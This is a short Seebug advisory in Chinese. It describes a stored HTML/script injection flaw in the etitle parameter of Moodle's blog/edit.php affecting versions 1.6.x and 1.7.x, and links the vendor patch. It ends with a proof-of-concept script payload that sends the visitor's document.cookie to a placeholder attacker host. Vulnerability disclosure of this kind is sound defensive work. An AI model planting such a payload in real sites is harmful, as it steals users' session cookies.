Moodle etitle参数HTML注入漏洞

2008-07-24T00:00:00
ID SSV:3711
Type seebug
Reporter Root
Modified 2008-07-24T00:00:00

Description

BUGTRAQ ID: 30348

Moodle是流行的开放源码课程管理系统。

Moodle的blog/edit.php文件中没有正确地过滤对etitle参数的输入便进行了存储,如果远程攻击者提交了创建带有恶意标题的blog项请求的话,就会在用户浏览器中注入并执行任意HTML和脚本代码。

Moodle Moodle 1.7.x Moodle Moodle 1.6.x Moodle


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=http://cvs.moodle.org/moodle/blog/lib.php?r1=1.38.6.3&r2=1.38.6.2 target=_blank>http://cvs.moodle.org/moodle/blog/lib.php?r1=1.38.6.3&r2=1.38.6.2</a>

                                        
                                            
                                                &lt;script&gt;location='http://evil.foo/x.php?'+document.cookie&lt;/script&gt;